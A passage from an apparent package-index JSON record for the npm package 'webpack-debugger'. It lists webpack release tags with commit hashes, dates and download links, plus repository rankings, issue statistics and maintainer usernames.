ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta9/manifests"},{"name":"v1.1.0-beta8","sha":"48ace947f915a9388b87119d43afb4e5580c2ed8","kind":"commit","published_at":"2014-03-12T22:03:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta8/manifests"},{"name":"v1.1.0-beta7","sha":"06056a40bee6fc843d15b854f6b0c7bacc381ac6","kind":"commit","published_at":"2014-03-12T21:30:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta7/manifests"},{"name":"v1.1.0-beta6","sha":"5ab7bf35ae2ad2ba1defe4cee4c5ab46679f1534","kind":"commit","published_at":"2014-03-11T17:43:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta6/manifests"},{"name":"v1.1.0-beta5","sha":"00c11cb7c27dfb416e36cf21200bad0c86cea34c","kind":"commit","published_at":"2014-03-11T15:08:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta5/manifests"},{"name":"v1.1.0-beta4","sha":"8ec37911f52b476f57e75480e642c7932dc43112","kind":"commit","published_at":"2014-03-10T13:00:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta4/manifests"},{"name":"v1.1.0-beta3","sha":"4a47a7add67c38faec552ae0e06da7632758c022","kind":"commit","published_at":"2014-03-07T16:08:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta3/manifests"},{"name":"v1.1.0-beta2","sha":"65ac850ab7b425a5c2264bd60a91fdf9b1e891ea","kind":"commit","published_at":"2014-03-05T19:10:29.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta2/manifests"},{"name":"v1.1.0-beta1","sha":"b27540e27bc34809110b180a19a3e56537aeb8df","kind":"commit","published_at":"2014-03-03T14:21:03.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.1.0-beta1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.1.0-beta1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.1.0-beta1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.1.0-beta1/manifests"},{"name":"v1.0.5","sha":"09afa4749babcfc8dd4aa2866b385c27cf00ce59","kind":"commit","published_at":"2014-03-01T19:07:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.5/manifests"},{"name":"v1.0.4","sha":"b88938ceea7f2017723f2baf21d604ce726b2c4a","kind":"commit","published_at":"2014-03-01T12:37:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.4/manifests"},{"name":"v1.0.3","sha":"f172af367494f70acdb194adca1624df9bee05c5","kind":"commit","published_at":"2014-02-27T08:20:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.3/manifests"},{"name":"v1.0.1","sha":"c5f3bdec73c8efcf0179fe966230c652e8111557","kind":"commit","published_at":"2014-02-24T14:07:42.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.1/manifests"},{"name":"v1.0.0","sha":"5530e3784dbad2952ce210a7ad4fa5e87b7c14c2","kind":"commit","published_at":"2014-02-19T22:09:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0/manifests"},{"name":"v1.0.0-rc12","sha":"b1092b01f39e4de332dd63ce0deb51ad2af18bfc","kind":"commit","published_at":"2014-02-15T10:29:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc12","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc12/manifests"},{"name":"v1.0.0-rc11","sha":"1640c651604417d6169a3cbd0d11ad8f592e2c70","kind":"commit","published_at":"2014-02-14T11:48:33.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc11","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc11/manifests"},{"name":"v1.0.0-rc10","sha":"4f8ef991f1e7e5256fc061adbd8ba095c84c0d26","kind":"commit","published_at":"2014-02-14T09:07:44.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc10","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc10/manifests"},{"name":"v1.0.0-rc9","sha":"820f304a9a77ae33bbe17d6eaac10595e5434543","kind":"commit","published_at":"2014-02-13T16:32:31.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc9/manifests"},{"name":"v1.0.0-rc8","sha":"254c81c6afa7ac18030ab4bf3e37ab37ffbf1ea0","kind":"commit","published_at":"2014-02-13T10:42:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc8/manifests"},{"name":"v1.0.0-rc7","sha":"78810b969193cf153b2f1c56c06d637f10afb6f4","kind":"commit","published_at":"2014-02-12T13:53:40.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc7/manifests"},{"name":"v1.0.0-rc6","sha":"fa6f328f8210f28153d1cd86e1e7fa2da0e39d57","kind":"commit","published_at":"2014-02-12T08:00:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc6/manifests"},{"name":"v1.0.0-rc5","sha":"7044c7a0f88a3f8645541330a9f235f66526b6ad","kind":"commit","published_at":"2014-02-11T12:30:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc5/manifests"},{"name":"v1.0.0-rc4","sha":"6b7c23fb3181fa118a69ba3e320eb9ff57f249a4","kind":"commit","published_at":"2014-02-11T11:25:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc4/manifests"},{"name":"v1.0.0-rc3","sha":"60684612b21b2f9481073fade5dbf0b0743fe833","kind":"commit","published_at":"2014-02-05T11:37:52.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc3/manifests"},{"name":"v1.0.0-rc2","sha":"81d90ac4b8860ebb9ab3e5485a804becbd18c1ca","kind":"commit","published_at":"2014-02-05T11:05:16.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc2/manifests"},{"name":"v1.0.0-rc1","sha":"5965a3a96a711629bcde184162c0f25f51da80dc","kind":"commit","published_at":"2014-02-03T17:21:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-rc1","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-rc1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-rc1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-rc1/manifests"},{"name":"v1.0.0-beta9","sha":"0752c3bfff32b0a5beca6b8da5f6bd7eb34abd0e","kind":"commit","published_at":"2014-01-31T13:09:15.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta9","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta9/manifests"},{"name":"v1.0.0-beta8","sha":"e58f315f321e6535a9ff34a8b87f949919dace01","kind":"commit","published_at":"2014-01-24T12:33:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta8","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta8/manifests"},{"name":"v1.0.0-beta7","sha":"8be2e5a14ac873b703119362b5c3447eb8e5f60e","kind":"commit","published_at":"2014-01-21T15:25:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta7","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta7/manifests"},{"name":"v1.0.0-beta6","sha":"a9fc61ff1a22091135f183809fb537a1325e532b","kind":"commit","published_at":"2014-01-10T09:49:30.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta6","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta6/manifests"},{"name":"v1.0.0-beta5","sha":"cf45c9cd1cce6e3136894ace4f9ae8618d1211a1","kind":"commit","published_at":"2014-01-08T18:23:55.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta5","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta5/manifests"},{"name":"v1.0.0-beta4","sha":"df0f3687db404a87eab75af62504828ce13dd03d","kind":"commit","published_at":"2013-12-29T11:21:35.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta4","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta4/manifests"},{"name":"v1.0.0-beta3","sha":"a4c58898ff5395124ac8e2cf79c25095fbe8a98e","kind":"commit","published_at":"2013-12-29T11:11:26.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta3/manifests"},{"name":"v1.0.0-beta2","sha":"f30bcfbd5793f9282d7dedb0ea0a20674f763fed","kind":"commit","published_at":"2013-12-19T22:23:28.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.0.0-beta2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.0.0-beta2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.0.0-beta2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.0.0-beta2/manifests"}]},"repo_metadata_updated_at":"2026-08-30T19:33:33.658Z","dependent_packages_count":0,"downloads":9,"downloads_period":"last-month","dependent_repos_count":1,"rankings":{"downloads":54.90282062971637,"dependent_repos_count":10.295976646711454,"dependent_packages_count":51.836728746128266,"stargazers_count":0.07882114490654064,"forks_count":0.39273321703433056,"docker_downloads_count":null,"average":23.501416076899392},"purl":"pkg:npm/webpack-debugger","advisories":[],"docker_usage_url":"https://docker.ecosyste.ms/usage/npm/webpack-debugger","docker_dependents_count":null,"docker_downloads_count":null,"usage_url":"https://repos.ecosyste.ms/usage/npm/webpack-debugger","dependent_repositories_url":"https://repos.ecosyste.ms/api/v1/usage/npm/webpack-debugger/dependencies","status":null,"funding_links":["https://opencollective.com/webpack"],"critical":null,"issue_metadata":{"last_synced_at":"2026-08-30T17:00:08.374Z","issues_count":10165,"pull_requests_count":9450,"avg_time_to_close_issue":10849647.758436048,"avg_time_to_close_pull_request":2768513.495560301,"issues_closed_count":9898,"pull_requests_closed_count":8897,"pull_request_authors_count":1445,"issue_authors_count":6686,"avg_comments_per_issue":5.8349237579931135,"avg_comments_per_pull_request":3.1827513227513227,"merged_pull_requests_count":6033,"bot_issues_count":8,"bot_pull_requests_count":2915,"past_year_issues_count":80,"past_year_pull_requests_count":940,"past_year_avg_time_to_close_issue":868643.701754386,"past_year_avg_time_to_close_pull_request":361830.065948856,"past_year_issues_closed_count":57,"past_year_pull_requests_closed_count":743,"past_year_pull_request_authors_count":79,"past_year_issue_authors_count":62,"past_year_avg_comments_per_issue":3.4625,"past_year_avg_comments_per_pull_request":4.925531914893617,"past_year_bot_issues_count":1,"past_year_bot_pull_requests_count":140,"past_year_merged_pull_requests_count":590,"issues_url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/issues","maintainers":[{"login":"sokra","count":1358,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sokra"},{"login":"alexander-akait","count":1089,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/alexander-akait"},{"login":"vankop","count":196,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/vankop"},{"login":"TheLarkInn","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/TheLarkInn"},{"login":"ooflorent","count":177,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ooflorent"},{"login":"hai-x","count":128,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hai-x"},{"login":"xiaoxiaojx","count":112,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xiaoxiaojx"},{"login":"timse","count":100,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/timse"},{"login":"snitin315","count":98,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/snitin315"},{"login":"jhnns","count":78,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jhnns"},{"login":"xtuc","count":54,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/xtuc"},{"login":"smelukov","count":52,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/smelukov"},{"login":"bjohansebas","count":43,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/bjohansebas"},{"login":"evenstensberg","count":37,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/evenstensberg"},{"login":"chenxsan","count":36,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/chenxsan"},{"login":"Legends","count":35,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Legends"},{"login":"Jessidhia","count":34,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Jessidhia"},{"login":"avivkeller","count":33,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/avivkeller"},{"login":"ScriptedAlchemy","count":29,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ScriptedAlchemy"},{"login":"jamesgeorge007","count":26,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jamesgeorge007"},{"login":"michael-ciniawsky","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/michael-ciniawsky"},{"login":"EugeneHlushko","count":23,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/EugeneHlushko"},{"login":"Connormiha","count":20,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Connormiha"},{"login":"hiroppy","count":19,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/hiroppy"},{"login":"samccone","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/samccone"},{"login":"SpaceK33z","count":15,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/SpaceK33z"},{"login":"sendilkumarn","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/sendilkumarn"},{"login":"mc-zone","count":14,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/mc-zone"},{"login":"gajus","count":13,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gajus"},{"login":"ljqx","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljqx"},{"login":"byzyk","count":11,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/byzyk"},{"login":"gpoitch","count":10,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/gpoitch"},{"login":"kentcdodds","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/kentcdodds"},{"login":"nveenjain","count":9,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/nveenjain"},{"login":"jbottigliero","count":8,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/jbottigliero"},{"login":"JounQin","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/JounQin"},{"login":"edmorley","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/edmorley"},{"login":"pierreneter","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/pierreneter"},{"login":"elliottsj","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/elliottsj"},{"login":"montogeek","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/montogeek"},{"login":"burhanuday","count":7,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/burhanuday"},{"login":"Janpot","count":6,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/Janpot"},{"login":"shama","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/shama"},{"login":"ovflowd","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ovflowd"},{"login":"billyjanitsch","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/billyjanitsch"},{"login":"keblodev","count":5,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/keblodev"},{"login":"matheus1lva","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/matheus1lva"},{"login":"ljcrapo","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/ljcrapo"},{"login":"rishabh3112","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/rishabh3112"},{"login":"anikethsaha","count":4,"url":"https://issues.ecosyste.ms/api/v1/hosts/GitHub/authors/anikethsaha"},{"login":"joshwiens","count":3,"url":"https://issues.ecosyste.ms/api/v